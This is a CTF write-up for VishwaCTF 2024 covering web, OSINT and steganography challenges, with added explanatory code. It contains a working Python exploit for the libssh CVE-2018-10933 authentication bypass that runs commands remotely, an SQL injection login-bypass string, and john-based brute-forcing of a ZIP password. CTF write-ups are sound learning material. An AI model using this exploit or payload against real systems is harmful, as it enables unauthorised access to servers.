CTF WriteUp: VishwaCTF 2024

vishwaCTF_2024_cert.png

After a long time, I participated in a CTF over this weekend: VishwaCTF-2024. It was a beginner-friendly CTF where I solved some challenges. Below is the writeup for the challenges that I managed to solve.

All challenges can be found here

Web

Save The City

Description

The RAW Has Got An Input That ISIS Has Planted a Bomb Somewhere In The Pune! Fortunately, RAW Has Infiltrated The Internet Activity of One Suspect And They Found This Link. You Have To Find The Location ASAP!

After opening the site I stumbled upon a blank page with nothing but "libssh_0.8.1", so I googled for an exploit for this particular version, learned that it is vulnerable to an authentication bypass (CVE-2018-10933), and got this page where

Exploit

import sys
import paramiko
import socket

s = socket.socket()
s.connect(("13.234.11.113",31133))
m = paramiko.message.Message()
t = paramiko.transport.Transport(s)
t.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(m)
c = t.open_session(timeout=5)
c.exec_command(sys.argv[1])
out = c.makefile("rb",2048)
output = out.read()
out.close()
print (output)

After ls'ing the directory, we got the flag:

python solve.py "cat secret.txt/flag.txt"
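
Why the script above gets a session without credentials, as an added example that is not part of the original writeup and is not libssh source code: a simplified Python model of a server packet dispatcher, with and without a check on which message types a client may send. The class names, reply strings and password are hypothetical; only the message numbers are real (RFC 4252 and RFC 4254).

```python
# Simplified model of an SSH server packet dispatcher; NOT libssh source code.
# Message numbers are the real ones (RFC 4252 / RFC 4254); all else is hypothetical.
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_SUCCESS = 52   # legitimately sent only by a server to a client
SSH_MSG_CHANNEL_OPEN = 90


class VulnerableServer:
    """Dispatches every message type it has a handler for, whatever the role."""

    def __init__(self, password):
        self._password = password      # constructed credential for the demo
        self.authenticated = False

    def handle(self, msg_type, payload=None):
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            self.authenticated = payload == self._password
            return "auth-ok" if self.authenticated else "auth-failed"
        if msg_type == SSH_MSG_USERAUTH_SUCCESS:
            # Handler meant for the client role: it records that authentication
            # succeeded. Reached on a server, the peer's claim becomes the verdict.
            self.authenticated = True
            return "accepted"
        if msg_type == SSH_MSG_CHANNEL_OPEN:
            return "channel-open" if self.authenticated else "denied"
        return "unimplemented"


class PatchedServer(VulnerableServer):
    """Rejects message types a client may never send before dispatching."""

    ALLOWED_FROM_CLIENT = {SSH_MSG_USERAUTH_REQUEST, SSH_MSG_CHANNEL_OPEN}

    def handle(self, msg_type, payload=None):
        if msg_type not in self.ALLOWED_FROM_CLIENT:
            return "rejected"
        return super().handle(msg_type, payload)


def replay(server_cls, packets):
    """Feed a packet sequence to a fresh server and collect its replies."""
    server = server_cls("constructed-password")
    return [server.handle(*packet) for packet in packets]


# Constructed sequences: the first mirrors the script above (no credentials).
BYPASS = [(SSH_MSG_USERAUTH_SUCCESS,), (SSH_MSG_CHANNEL_OPEN,)]
LEGIT = [(SSH_MSG_USERAUTH_REQUEST, "constructed-password"), (SSH_MSG_CHANNEL_OPEN,)]
```

replay(VulnerableServer, BYPASS) ends with the channel opened, while replay(PatchedServer, BYPASS) ends with it denied and the normal login in LEGIT still works.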

Trip To Us

Description

IIT kharakpur is organizing a US Industrial Visit. The cost of the registration is $1000. But as always there is an opportunity for intelligent minds. Find the hidden login and Get the flag to get yourself a free US trip ticket.

It was a typical SQLi bypass challenge; using admin" or "1"="1"-- as the username and password, I was able to bypass it.

They Are Coming

Description

Aesthetic Looking army of 128 Robots with AGI Capabilities are coming to destroy our locality!

Nothing interesting on the home page at first glance. Looking at the source code, I found a JS file where the bottom portion of the code caught my attention after beautifying it:

yt = () => {
    localStorage.setItem("userRole", "admin"), localStorage.setItem("F1ag", "Open Your Eyes!"), localStorage.setItem("lastLogin", "2023-01-01T12:00:00Z"), localStorage.setItem("theme", "dark"), localStorage.setItem("language", "en_US"), localStorage.setItem("isLoggedIn", "true"), localStorage.setItem("unreadMessages", "5"), localStorage.setItem("preferredCurrency", "USD");
    return localStorage.setItem("DivID", "205"), localStorage.setItem("Flag", "Gkul0oJKhNZ1E8nxwnMY8Ljn1KNEW9G9l+w243EQt0M4si+fhPQdxoaKkHVTGjmA"), localStorage.setItem("AppVer", "1.0"), (0, vt.jsx)(vt.Fragment, {
        children: (0, vt.jsxs)("div", {
            className: "hint-main",
            children: [(0, vt.jsx)("h1", {
                className: "hint",
                children: "A Courrpt AI Agent and Its Army of 128 Aesthetic Looking Robots Are Heading Towards Local Vault of the City of Dawn!"
            }), (0, vt.jsx)("p", {
                className: "hint1",
                style: {
                    display: "none"
                },
                children: "I have done 128 cbc tests"
            })]
        })
    })
},
bt = {
    hh188: "/",
    getKey: "/secret-location"
};

As we can see, some data is being stored in local storage, and the more interesting item is Flag, which has some encrypted value.

Hmm, so most probably this is the real flag, encrypted using a key? If so, which encryption standard and which key?

About the encryption algorithm, we already have some hints: in the code above there is a children key with the value I have done 128 cbc tests, so it's most likely AES 128 CBC.

And the key? If we check robots.txt, we are all sorted out:

User-agent: *
Disallow: /admin
L3NlY3JldC1sb2NhdGlvbg==
Decryption key: th1s_1s_n0t_t5e_f1a9

Now that we have the decryption key and the cipher as well, we are ready to go to this site, and we got the flag.

theyarecoming_flag.png
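
What this challenge's robots.txt gives away, as an added example that is not part of the original writeup: a small audit that flags every line of a robots.txt that is not a crawl directive and decodes base64 where it can. The function names, the list of known fields and the keyword pattern are assumptions made for the example; the file body is the one quoted above, and its base64 line decodes to the same path as getKey in the bundle.

```python
import base64
import re

# robots.txt body exactly as quoted in the writeup above
ROBOTS = """User-agent: *
Disallow: /admin
L3NlY3JldC1sb2NhdGlvbg==
Decryption key: th1s_1s_n0t_t5e_f1a9
"""

# Assumed allow-list of directive names and an assumed keyword heuristic
KNOWN_FIELDS = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay"}
SECRET_WORDS = re.compile(r"key|secret|passw|token", re.I)


def try_base64(text):
    """Return the decoded text if `text` is strict base64 of printable ASCII."""
    try:
        decoded = base64.b64decode(text, validate=True).decode("ascii")
    except ValueError:          # covers binascii.Error and UnicodeDecodeError
        return None
    return decoded if decoded and decoded.isprintable() else None


def audit_robots(body):
    """Return (line number, issue, detail) for lines that are not crawl rules."""
    findings = []
    for number, raw in enumerate(body.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()     # drop robots.txt comments
        if not line:
            continue
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() in KNOWN_FIELDS:
            continue
        decoded = try_base64(line)
        if decoded is not None:
            findings.append((number, "base64 is encoding, not protection", decoded))
        elif SECRET_WORDS.search(line):
            findings.append((number, "secret material in a public file", value.strip()))
        else:
            findings.append((number, "not a robots.txt directive", line))
    return findings


if __name__ == "__main__":
    for finding in audit_robots(ROBOTS):
        print(finding)
```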

OSINT

The end is beginning

Description

desc.png

Searching for

I’d be gone to my dad  
And ask for some cash
I ran ......

shows me rap song results. Maybe it's connected to the lyrics of this particular song, so going through the lyrics I figured out the second portion of the flag, that is

lyrics.png

and the first part was the name of the song, i.e. Paradox, so the flag will be

VishwaCTF{Paradox_5000}

TRY HACK ME

Description

thm_desc.png

As the description says one of the team members, I went straight to their official page, where they have a page for their team members at the bottom.

After checking each member's profile by username, one of them has the same ranking as mentioned, and the flag mentioned in the description as well.

thm_profile.png

ifconfig_inet

Description

ifconfig_desc.png

Hmm, sounds familiar though. Okay, after reading the whole description I searched for this:

search.png

As we can see, we got some Reddit pages that are about some IP address (BTW this challenge is regarding the famous television series Mr. Robot, so if you have watched it, it may give you some insights).

I got this image:

ips.png

So maybe the highlighted one is what we are searching for, but we are still left with the .dat file that is the first half of our flag. Searching more gives me this page

and here some people were talking about IP addresses. Reading their chat, I got the file name, i.e. fsociety00.dat

dat_file.gif

So the flag is

VishwaCTF{fsociety00.dat_218.108.149.373}

Post CTF

Steg

We Are Valorant

Description

valorant_desc.png

We are given two files, i.e. we_are_valorant.adts and Astra_!!.mp4. After checking the format of the .adts file using the file command, it shows it's a jpg.

After changing its magic numbers to jpg it turns out to be a Valorant-themed jpg file. I tried getting some info from this file but to no use, and also uploaded it to the Aperi site but got nothing.

But when I changed the extension of the original one, i.e. we_are_valorant.adts, to .jpg and uploaded it there, there were some Common Passwords, e.g. Tenz, tenz, From the shadows, Dissipate, dissipate, Kyedae, kyedae

Using steghide with the first password, that is Tenz, extracts a file not_a_secret.txt that contains the flag.

VishwaCTF{you_are_invited_to_the_biggest_valorant_event}

Mysterious Old Case

Description

You, as an FBI Agent, are working on an old case involving a ransom of $200,000. After some digging you recovered an audio recording.

Here we are given final.mp3, and upon checking its exif we got this:

ExifTool Version Number         : 12.65
File Name : final.mp3
Directory : .
File Size : 2.6 MB
File Modification Date/Time : 2024:03:01 23:06:29-05:00
File Access Date/Time : 2024:03:03 22:21:21-05:00
File Inode Change Date/Time : 2024:03:01 23:08:07-05:00
File Permissions : -rw-r--r--
File Type : MP3
File Type Extension : mp3
MIME Type : audio/mpeg
MPEG Audio Version : 1
Audio Layer : 3
Audio Bitrate : 128 kbps
Sample Rate : 44100
Channel Mode : Stereo
MS Stereo : Off
Intensity Stereo : Off
Copyright Flag : False
Original Media : False
Emphasis : None
ID3 Size : 320209
Title : Unknown
Artist : Anonymous
Track : 727/305
Album : Cooper
Recording Time : 1971
Genre : the zip file is 100 MB not 7 GB
Original Release Time : 0001
Band : DB Cooper
Comment : password for the zip is all lowecase with no spaces
User Defined URL : https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
User Defined Text : (purl) https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
Picture MIME Type : image/jpeg
Picture Type : Front Cover
Picture Description : Front Cover
Picture : (Binary data 158421 bytes, use -b option to extract)
Date/Time Original : 1971
Duration : 0:02:22 (approx)

Here are some exif fields that caught my attention, i.e. Genre, Band, Comment and User Defined URL. In the URL we are given a Drive file link to a log zip file named flight_logs.zip that is encrypted.

The comment says password for the zip is all lowecase with no spaces, but we don't even have a password so far.

And if you look at Band, it has the value DB Cooper. I searched it on Google and got to know that it's the name of a person who hijacked Northwest Orient Airlines Flight 305, a Boeing 727 aircraft, in United States airspace on November 24, 1971.

And because our file name is flight_log.zip, it connects with our insights and shows that we are heading in the right direction.

I tried some passwords from the exif info but to no use. But I had all the info about DB Cooper from Wikipedia, the major part being what I mentioned above, so I then tried the name of the flight, that is Northwest Orient Airlines Flight, as the password: northwestorientairlines, and it worked indeed.

Now if we look inside the folder we have thousands of log files, and that's intimidating, but a very simple logic of mine worked there: I sorted all the files on the basis of their size, i.e.

└─$ ls -lSh | head
total 7.4G
-rwxr-xr-x 1 zr0x zr0x 14M Feb 26 12:25 Flight-305.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:09 Flight-2270.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-448.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-4551.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-533.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:10 Flight-5358.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-6294.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-651.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-6867.log

So if you look at the list, the first one is Flight-305.log, and that's the desired one.

It contains around 30,0000 lines; if you scroll through it gradually you'll see parts of the flag, so we can either grab them one by one or filter them out using a regex and tr, e.g.

└─$ grep -v '^1971-11-24.*727$' Flight-305.log | tr '\n' ' ' | tr -d ' '
VishwaCTF{1_W!LL_3E_B@CK}

BTW we could have found the targeted log file simply by the flight number that is mentioned in Wikipedia, i.e. Flight 305.

Secret Code

Description

Akshay has a letter for you and need your help

We get two files: confidential.jpg and letter.txt.

cat'ing letter.txt says:

To,
VishwaCTF'24 Participant

I am Akshay, an ex employee at a Tech firm. Over all the years, I have been trading Cypto currencies and made a lot of money doing that. Now I want to withdraw my money, but I'll be charged a huge tax for the transaction in my country.

I got to know that you are a nice person and also your country doesn't charge any tax so I need your help.

I want you to withdraw the money and hand over to me. But I feel some hackers are spying on my internet activity, so I am sharing this file with you. Get the password and withdraw it before the hackers have the access to my account.

Your friend,
Akshay

No useful information here, so I started working on the jpg file. As you can see below, strings shows that it contains some more files inside itself; you can extract them using foremost, and sometimes unzip works as well.

└─$ strings -10 confidential.jpg            
'9=82<.342
!22222222222222222222222222222222222222222222222222
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
5ecr3t_c0de.zip
5ecr3t_c0de.txt
:Ca&;hhyy*;
7<;P>wUr;3
:`Nw(HOR7A
utHV<=UC|Z
helper.txtM
5ecr3t_c0de.zip
helper.txt
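
A check for the two file tricks seen in this writeup (the .adts file that is really a JPEG in We Are Valorant, and the ZIP riding inside confidential.jpg here), as an added example that is not part of the original writeup: it identifies a file by its magic bytes and reports any ZIP archive appended to it. The function names and the bytes built by make_sample() are constructed for illustration and are not the challenge files.

```python
import io
import zipfile

MAGIC = {b"\xff\xd8\xff": "jpeg", b"PK\x03\x04": "zip", b"ID3": "mp3"}
JPEG_EOI = b"\xff\xd9"


def sniff(blob):
    """Identify a file by its leading bytes, ignoring whatever its extension says."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    # ADTS has no fixed magic: 12 sync bits set, one ID bit, then layer == 00
    if len(blob) > 1 and blob[0] == 0xFF and blob[1] & 0xF6 == 0xF0:
        return "adts"
    return "unknown"


def embedded_zip(blob):
    """Return (offset, member names, any member encrypted) for a ZIP inside blob."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            infos = zf.infolist()
    except zipfile.BadZipFile:
        return None
    if not infos:
        return None
    # zipfile finds the archive from its end-of-central-directory record and
    # shifts header offsets to account for data placed in front of it.
    start = min(info.header_offset for info in infos)
    names = [info.filename for info in infos]
    return start, names, any(info.flag_bits & 0x1 for info in infos)


def make_sample():
    """Constructed stand-in for confidential.jpg: JPEG-like bytes, then a ZIP."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + JPEG_EOI   # not a decodable image
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("helper.txt", "constructed note")
        zf.writestr("5ecr3t_c0de.zip", b"placeholder bytes")
    return jpeg, jpeg + buf.getvalue()


if __name__ == "__main__":
    jpeg_only, polyglot = make_sample()
    print(sniff(polyglot), embedded_zip(polyglot), embedded_zip(jpeg_only))
```

An offset greater than zero means the archive starts after other data, which is what foremost and unzip rely on when they pull files out of an image.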

Here helper.txt says:

└─$ cat helper.txt 
Hey buddy, I'm really sorry if this takes long for you to get the password. But it's a matter of $10,000,000 so I can't risk it out.

"I really can't remember the password for zip. All I can remember is it was a 6 digit number. Hope you can figure it out easily"

Now 5ecr3t_c0de.zip is protected, and the password can be any 6-digit number up to 999999, so we can brute force it using john.

Script for generating all possible 6-digit numbers:

def generate_combinations():
    # Write every 6-digit candidate (000000 to 999999), zero-padded, one per line
    with open("possible_combinations.txt", "w") as file:
        for i in range(1000000):
            combination = str(i).zfill(6)
            file.write(combination + '\n')

if __name__ == "__main__":
    generate_combinations()

john command

┌──(zr0x㉿pwn3r)-[~/…/vishwaCTF-2024/steg/03_Secret_Code/tmp]
└─$ zip2john 5ecr3t_c0de.zip > secret.hash

┌──(zr0x㉿pwn3r)-[~/…/vishwaCTF-2024/steg/03_Secret_Code/tmp]
└─$ john secret.hash --wordlist=../possible_combinations.txt

After unzipping we got two files, i.e. 5ecr3t_c0de.txt and info.txt

info.txt

What are these random numbers? Is it related to the given image? Maybe you should find it out by yourself

5ecr3t_c0de.txt

└─$ cat 5ecr3t_c0de.txt|head
(443, 1096)
(444, 1096)
(445, 1096)
(3220, 1096)
(3221, 1096)
(38, 1097)
(39, 1097)
(43, 1097)
(80, 1097)
(81, 1097)
............
............

So looking at info and 5ecr3t_c0de, we can infer that the given numbers are coordinates that likely indicate positions of pixels within the image.
They are probably in (x, y) order, representing horizontal (x) and vertical (y) coordinates, or height and width sequentially.

So the anticipation is that we are given a blank black jpg image, and these are the flag coordinates, which will create or show the flag, most probably in white.

We can use this script for that:

from PIL import Image

def read_coordinates(file_path):
    # Each line looks like "(443, 1096)": strip the parentheses and parse an (x, y) tuple
    with open(file_path, 'r') as f:
        coordinates = [tuple(map(int, line.strip('()\n').split(','))) for line in f]
    return coordinates

def draw_white_pixels(image_path, coordinates, output_path):
    # Paint every listed pixel white on top of the given image and save the result
    img = Image.open(image_path)
    for coord in coordinates:
        img.putpixel(coord, (255, 255, 255)) # RGB value for white
    img.save(output_path)
    print(f"Done, check : {output_path}.")

image_path = '/confidential.jpg'
file_path = '/5ecr3t_c0de.txt'
output_path = 'output_image.png'

coordinates = read_coordinates(file_path)
draw_white_pixels(image_path, coordinates, output_path)

And here we go:

secret_flag.png

OSINT

Sagar Sangram

sangram_desc.png

Along with that short tale of a description, we are given a Discord server to join as well.

So if you are Indian and know the Indian mythological stories, then after reading this you'll figure out instantly that it's about the Samudra Manthana, a major episode in Hinduism that is elaborated in the Vishnu Purana, a major text of Hinduism.

So when we hop into the server, we are given some instructions in the rules section: we have to chat with a bot and answer some questions, all regarding the Samudra Manthana, and if we manage to answer them all we are given the flag at the end.

sagar_sangram.gif

Flag :

VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}

Forensics

yet to do …………